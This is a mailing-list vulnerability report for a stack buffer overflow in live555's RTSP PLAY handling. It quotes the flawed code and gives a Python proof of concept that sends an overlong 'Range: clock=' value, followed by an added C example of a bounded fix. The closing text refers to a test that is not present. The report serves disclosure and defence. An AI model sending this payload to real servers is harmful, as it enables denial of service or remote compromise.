[Live-devel] [Security Issue][liblivemedia] stack buffer overflow in liblivemedia
向小波
xiangxiaobo at iie.ac.cn
Wed Jul 8 21:07:16 PDT 2020
[summary]
In the latest version of the live555 media server, there is a stack-based buffer
overflow vulnerability when parsing the 'PLAY' command.
An attacker is able to send a sequence of malformed RTSP packets to trigger
this issue. In the worst case, the media server running this service can be
exploited remotely without user interaction.
[bug details]
The bug is in the function RTSPServer::RTSPClientSession::handleCmd_PLAY().
It calls sscanf to get the absolute start time and end time as
strings. This is an unsafe C function that should be handled with care.
```cpp
} else if (sscanf(paramStr, "clock = %n", &numCharsMatched3) == 0 &&
           numCharsMatched3 > 0) {
  rangeStart = rangeEnd = 0.0;
  char const* utcTimes = &paramStr[numCharsMatched3];
  size_t len = strlen(utcTimes) + 1;
  char* as = new char[len];
  char* ae = new char[len];
  int sscanfResult = sscanf(utcTimes, "%[^-]-%[^\r\n]", as, ae); // <=== dangerous function call
  if (sscanfResult == 2) {
    absStartTime = as;
    absEndTime = ae;
  } else if (sscanfResult == 1) {
```
The absStartTime and absEndTime are then written into a 100-byte buffer on the
stack. Since absStart and absEnd are controllable by us, it is possible to
overflow the buffer on the stack.
```cpp
char buf[100];
// ...
if (absStart != NULL) {
  // We're seeking by 'absolute' time:
  if (absEnd == NULL) {
    sprintf(buf, "Range: clock=%s-\r\n", absStart);
  } else {
    sprintf(buf, "Range: clock=%s-%s\r\n", absStart, absEnd);
  }
  delete[] absStart;
  delete[] absEnd;
}
```
[proof of concept]
I've attached a Python script to trigger this issue.
```python
import re
import socket
import sys
import time

s = socket.socket()
s.connect(("127.0.0.1", 8554))

# OPTIONS
payload = 'OPTIONS rtsp://localhost:8554/small.ogv RTSP/1.0\r\n'
payload += 'CSeq: 2\r\n'
payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\n\r\n'
s.send(payload.encode())
time.sleep(0.1)
data = s.recv(0x10000)
print(data)

# DESCRIBE
payload = 'DESCRIBE rtsp://localhost:8554/small.ogv RTSP/1.0\r\nCSeq: 3\r\n'
payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\n'
payload += 'Accept: application/sdp\r\n\r\n'
s.send(payload.encode())
time.sleep(0.1)
print(s.recv(0x10000))

# SETUP: the response carries the session id needed for PLAY
payload = 'SETUP rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq: 4\r\n'
payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\n'
payload += 'Transport: RTP/AVP;unicast;client_port=53642-53643\r\n\r\n'
s.send(payload.encode())
time.sleep(0.1)
res = s.recv(0x10000)
print(res)

# Extract the id from the "Session: <id>;timeout=..." header of the SETUP reply
m = re.search(rb'Session:\s*([^;\r\n]+)', res)
if m is None:
    sys.exit('no Session header in SETUP response')
sessionId = m.group(1).decode()

# PLAY with an overlong absolute start time in the "Range: clock=" parameter;
# the server copies it into a 100-byte stack buffer with sprintf
payload = 'PLAY rtsp://127.0.0.1:8554/small.ogv/track1 RTSP/1.0\r\nCSeq: 7\r\n'
payload += 'User-Agent: ./testProgs/openRTSP (LIVE555 Streaming Media v2019.05.29)\r\n'
payload += 'Session: %s\r\n\r\nRange: clock = ' % sessionId
payload += '0.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000-0.01\r\n\r\n'
s.send(payload.encode())
time.sleep(0.1)
print(s.recv(0x10000))

# keep the connection open so the server does not tear the session down
while True:
    pass
```
Best Regards,
Xiaobo Xiang
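The following is an added example, not live555 code and not part of the original report. It re-implements the two steps the report describes in stand-alone C: parsing "clock = <start>-<end>" with the same sscanf pattern into heap strings sized to the input (which by itself cannot overflow), then building the "Range:" line. In place of the unbounded sprintf into a 100-byte stack buffer it uses a bounded formatter that refuses oversized input, and it constructs a parameter in the shape of the PoC's (a start time of over a hundred digits) to show the boundary at which the original buffer is overrun. All function names (parse_clock_range, range_line_length, format_range_line, poc_range_param, poc_overflows) are hypothetical.

```c
/* Added example, not live555 code: the report's parse and format steps,
 * with a bounded formatter instead of sprintf. Names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RANGE_BUF_SIZE 100   /* size of the stack buffer in the report */

/* Parse "clock = <start>-<end>" the way the reported sscanf pattern does.
 * Returns the number of fields matched (0, 1 or 2); *start/*end are heap
 * strings the caller frees, each no longer than the input, so this step
 * is safe on its own. The danger is what the strings are later fed to. */
int parse_clock_range(const char *param, char **start, char **end)
{
    int matched = 0;
    *start = *end = NULL;
    /* "%n" records how many characters the literal "clock = " consumed */
    if (sscanf(param, "clock = %n", &matched) != 0 || matched == 0)
        return 0;
    const char *utc = param + matched;
    size_t len = strlen(utc) + 1;
    char *as = malloc(len), *ae = malloc(len);
    if (as == NULL || ae == NULL) { free(as); free(ae); return 0; }
    int n = sscanf(utc, "%[^-]-%[^\r\n]", as, ae);
    if (n >= 1) *start = as; else free(as);
    if (n == 2) *end = ae; else free(ae);
    return n < 0 ? 0 : n;
}

/* Bytes (without the NUL) the "Range:" line built from start/end needs.
 * At RANGE_BUF_SIZE or above it would overrun the report's buffer. */
size_t range_line_length(const char *start, const char *end)
{
    int n = (end == NULL)
        ? snprintf(NULL, 0, "Range: clock=%s-\r\n", start)
        : snprintf(NULL, 0, "Range: clock=%s-%s\r\n", start, end);
    return n < 0 ? 0 : (size_t)n;
}

/* Bounded replacement for the sprintf in the report: returns the length
 * written, or -1 (buffer emptied) when the line does not fit, so an
 * oversized Range can be answered with an error instead of smashing the
 * stack. Silent truncation would be wrong too: it would alter the time. */
int format_range_line(char *buf, size_t bufsize, const char *start, const char *end)
{
    int n = (end == NULL)
        ? snprintf(buf, bufsize, "Range: clock=%s-\r\n", start)
        : snprintf(buf, bufsize, "Range: clock=%s-%s\r\n", start, end);
    if (n < 0 || (size_t)n >= bufsize) {
        if (bufsize > 0) buf[0] = '\0';
        return -1;
    }
    return n;
}

/* Constructed input in the shape of the PoC's Range parameter:
 * "clock = 0.<zeros digits>-0.01". Caller frees. */
char *poc_range_param(size_t zeros)
{
    const char prefix[] = "clock = 0.";
    const char suffix[] = "-0.01";
    char *p = malloc(sizeof prefix - 1 + zeros + sizeof suffix);
    if (p == NULL) return NULL;
    memcpy(p, prefix, sizeof prefix - 1);
    memset(p + sizeof prefix - 1, '0', zeros);
    memcpy(p + sizeof prefix - 1 + zeros, suffix, sizeof suffix); /* copies the NUL */
    return p;
}

/* 1 if a PoC-shaped parameter with this many digits would overrun the
 * 100-byte buffer, 0 otherwise. */
int poc_overflows(size_t zeros)
{
    char *p = poc_range_param(zeros), *s, *e;
    int over = 0;
    if (p != NULL && parse_clock_range(p, &s, &e) == 2) {
        over = range_line_length(s, e) >= RANGE_BUF_SIZE;
        free(s); free(e);
    }
    free(p);
    return over;
}

int main(void)
{
    char buf[RANGE_BUF_SIZE];
    char *s, *e;
    parse_clock_range("clock = 20200708T210716Z-20200708T211000Z", &s, &e);
    int n = format_range_line(buf, sizeof buf, s, e);
    printf("ok:  %d bytes: %s", n, buf);
    free(s); free(e);
    char *poc = poc_range_param(106);          /* over a hundred digits, like the PoC */
    parse_clock_range(poc, &s, &e);
    printf("poc: needs %zu bytes, bounded format returns %d\n",
           range_line_length(s, e), format_range_line(buf, sizeof buf, s, e));
    free(s); free(e); free(poc);
    return 0;
}
```

With the format "Range: clock=%s-%s\r\n" the fixed overhead is 20 bytes, so a start time of "0." plus 78 digits (80 characters) already needs 100 bytes plus the terminator; 77 digits is the last value that fits, which the test below checks on both sides of that boundary.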